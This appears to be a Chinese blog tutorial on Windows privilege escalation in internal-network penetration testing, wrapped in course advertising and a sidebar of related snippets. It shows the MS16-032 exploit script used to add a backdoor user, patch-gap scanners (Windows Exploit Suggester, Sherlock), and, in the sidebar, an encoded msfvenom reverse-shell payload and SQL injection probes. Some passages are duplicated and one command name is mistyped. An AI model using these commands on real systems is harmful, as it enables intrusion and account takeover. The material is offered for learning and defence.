内网渗透测试基础——权限提升分析及防御_查看当前mandatory level

于 2024-05-10 10:13:58 发布
阅读量286 收藏 10
点赞数 4
分类专栏: 程序员 文章标签: 单元测试 功能测试 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564150/article/details/138653553
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

知识点

“WMIC”是“Windows Management Instrumentation Command-line”的缩写。WMIC是Windows平台上最有用的命令行工具。使用WMIC,不仅可以管理本地计算机,还可以管理同一域内的所有计算机(需要一定的权限),而且在被 管理的计算机上不必事先安装WMIC。WMIC在信息收集和后渗透测试阶段是非常实用的,可以调取和查看目标机器的进程、服务、用户、用户组、网络连接、硬盘信息、网络共享信息、已安装的补丁、启动项、已安装的软件、操作系统的相关信息和时区等。

如果目标机器中存在MS16-032(KB3139914)漏洞,那么攻击者不仅能够利用Metasploit进行提权,还能够利用PowerShell下的Invoke-MS16-032.ps1脚本(进行提权。通过Invoke-MS16-032.ps1脚本可以执行任意程序,且可以带参数执行(全程无弹窗)。下面针对此问题进行测试。

把Invoke-MS16-032.ps1脚本上传到目标机器中(也可以远程下载并运行),然后执行如下命令,添加一个用户名为“1”、密码“1”的用户。

Invoke-MS16-032 -Application cmd.exe -Commandline “/c net user 1 1 /add”

查看当前用户,已经成功添加了用户“1”。此外,通过该脚本,可以添加和执行任意程序。执行如下命令,相当于启动“记事本”程序。

Invoke-MS6-032 -Application notepad.exe

1.2 Windows Exploit Suggester

Gotham Digital Security发布了一个名为“Windows Exploit Suggester"的工具,下载地址【https://github.com/GDSSecurity/Windows-Exploit-Suggester】。该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其需要的只有目标系统的信息。

使用systeminfo命令获取当前系统的补丁安装情况,并将补丁信息导入patches.txt文件,如图所示。

exploit suggester获取补丁patches

执行如下命令,从微软官方网站自动下载安全公告数据库,下载的文件会自动在当前目录下以Excel电子表格的形式保存 ,如图所示。

#python2 ./windows-exploit-suggester.py --update

下载安全公告数据库

输入如下命令,安装xlrd模块,如图所示。

pip install xlrd -upgrade

xlrd-upgrade

使用Windows-Exploit-Suggester工具进行预处理。执行如下命令,检查系统中是否存在未修复的漏洞。

#python2 ./windows-exploit-suggester.py -d 2019-02-02-mssb.xls -i patches.txt

在实际的网络环境中,如果系统中存在漏洞,就有可能被攻击这利用。目标系统中存在未修复的MS16-075、MS16-135等漏洞,攻击者只要利用这些漏洞,就能获取目标系统的System权限。因此,在发现漏洞后一定要及时进行修复。Metasploit还内置了local_exploit_suggester模块。这个模块用于快速识别系统中可能被利用的漏洞,使用方法如下,如图所示。

metasploit漏洞

1.3 PowerShell中的Sherlock脚本

通过PowerShell中的Sherlock脚本(https://github.com/rasta-mouse/Sherlock),可以快速查找可能用于本地权限提升的漏洞,如图所示。

Import-Module .\Sherlock.ps1

powershell-sherlock脚本

调用脚本后,可以搜索单个漏洞,也可以搜索所有未安装的补丁。在这里,输入如下命令,搜索所有未安装补丁,

Find-AllVulns

find-allvulns
302397585)]

调用脚本后,可以搜索单个漏洞,也可以搜索所有未安装的补丁。在这里,输入如下命令,搜索所有未安装补丁,

Find-AllVulns

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

2401_84564150
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
全面分析_Spring_的编程式事务管理及声明式事务管理
03-28
例如,`PROPAGATION_REQUIRED` 表示如果当前存在事务,则加入到当前事务中;如果不存在,则新建一个事务。其他的传播行为还有 `PROPAGATION_SUPPORTS`、`PROPAGATION_MANDATORY`、`PROPAGATION_REQUIRES_NEW`、`...
渗透越权测试
09-22
渗透越权测试网络安全领域中的一个重要概念,主要针对系统或应用程序中存在的权限控制漏洞进行测试。在信息化社会,数据安全和用户隐私保护变得至关重要,而越权操作往往是导致这些安全问题的源头之一。越权渗透...
【安全】靶场实战-通过MS16-032提权
03-04 1033
该漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞
Zichel77的博客
10-09 1338
比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编。因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来提权,这里就用最新的MS16-032来尝试提权,对应的编号是KB3139914。可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找提权的EXP,然后将系统已经安装的补。过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了。在WIN7中查看补丁信息。
利用WMIC实战MS16-032本地溢出漏洞
岁月净好
11-29 3109
假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell.   首先输入getuid命令查看已经获得的权限,可以看到现在的权限很低,是test权限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令提权,结果失败。 meterpreter > getsystem 接着查看系统的已达补丁,传统的方法是在目标机的CMD命令行下输入systeminfo命令,或者通过查
MS16-032 漏洞复现
EC_Carrot的博客
04-07 644
漏洞背景 Secondary Logon Service是其中的一个辅助登录服务。 Microsoft Windows的辅助登录服务存在特权提升漏洞,该漏洞源于程序没有正确管理内存中的请求句柄。本地攻击者可利用该漏洞以管理员身份运行任意代码。 微软在2016年3月8日已经更新了该漏洞的补丁文件KB3139914 影响范围 Microsoft Windows Vista SP2 Windows Server 2008 SP2和R2 SP1 Windows 7 SP1 Windows 8.1 Windows
利用ms16-032提权并打开3389端口
qq_45405155的博客
12-27 1349
利用ms16-032提权并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置权限,添加iis访问权限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
SELinux_System_Administration_Implement_mandatory_access_control
04-11
SELinux_System_Administration_Implement_mandatory_access_control.epub
强制性选择:你是不是喜欢我.zip_1TT_Mandatory choice_强制性选择
09-24
10. **测试**:进行全面的测试,包括单元测试、集成测试和系统测试,以确保程序在各种情况下都能正确运行。 总的来说,"强制性选择:你是不是喜欢我.exe"这个应用程序融合了编程技术、用户交互和情感交流的元素,它...
NodeJS_Mandatory_1
03-14
**Node.js基础与EJS模板引擎** Node.js是一款基于Chrome V8引擎的JavaScript运行环境,它让开发者可以在服务器端使用JavaScript进行开发。由于其非阻塞I/O模型和事件驱动的特点,Node.js非常适合构建高性能、高并发...
MS16-072导致WINDOWS 2008 2012基于用户过滤的组策略大面积失效
weixin_34278190的博客
10-15 155
最近发现很多,用户组策略失效,发现他们有一个共同的特点,就是他们使用的用户过滤,将默认的,Authernticated users从Security filtering中去掉,加入了相应的应该适用此组策略的特定用户或组。后来相了很久才发现是微软的安全更新改变了应用组策略的方法。安全更新是MS16-072 日期是:2016 06 14https://support.micros...
MS16-032提权正确方法
weixin_30311605的博客
03-18 1243
原版MS16-032提权会Spawn一个System Shell出来,只能通过Remote Desktop获取。这里修改exploit,直接反弹Shell。注意MS16-032依赖 thread handle,如果提了很多次后, thread handle用尽也无法成功。 root@kali:/tmp# wget https://raw.githubusercontent.com/samratas...
MS16-032 提权
prettyX的博客
06-16 1042
MS16-032 补丁编号:KB3139914 影响系统版本:Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows 2008 Server、Windows 2012 Server 漏洞下载地址:https://www.exploit-db.com/exploits/39719 系统要求:系统至少有2个以上CPU核心,否则利用脚本无法运行;PowerShell v2.0及以上版本 测试命令: powershell.exe -exec byp
powershell之ms16-032复现
qq_45300786的博客
12-14 663
因为楼主没有合适的靶机,就简单说一下环境要求。 1、存在ms16-032的靶机 2、ms16-032的ps1脚本 3、powershell默认是不能运行脚本的,请自己手动开启(百度) 4、ms16-032脚本:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 参考文章 http://www.96sec.org/blog/post/209.html https://blo
记一次ms16-032成功提权win7/win12
weixin_30608503的博客
04-03 524
E:\Tools\提权大结合\ms16-032>whoami pc-20140503jfge\administrator   首先查看权限是administrator 随后溢出 可以看到是system权限了 这是拿我本机试的。 可以在win12上成功溢出 exp不开源 转载于:https://www.cnblogs.com/wh4am1/p/6663998...
关于ms16-032复现在win7的一些坑(不联网环境下)
weixin_42146445的博客
12-17 612
1.得先允许执行脚本 set-ExecutionPolicy RemoteSigned 要不然是不允许执行.ps1脚本的 2.powershell import 由于没联网,所以我把github上面的invoke_ms16-032.ps1下载下来了。 先用powershell 命令进入powershell命令行。 然后得先执行 import-moudle .\invoke_ms-...
ms16_032系统提权
a439017985的博客
02-24 1480
1.利用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe 2.在msf下开启监听 use ex
PROPAGATION_MANDATORY
最新发布
05-01
PROPAGATION_MANDATORY是Spring事务传播行为的一种类型,它表示当前方法必须在一个已经存在的事务中运行。如果当前方法没有在一个已经存在的事务中运行,那么就会抛出异常。与PROPAGATION_REQUIRED不同,如果当前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值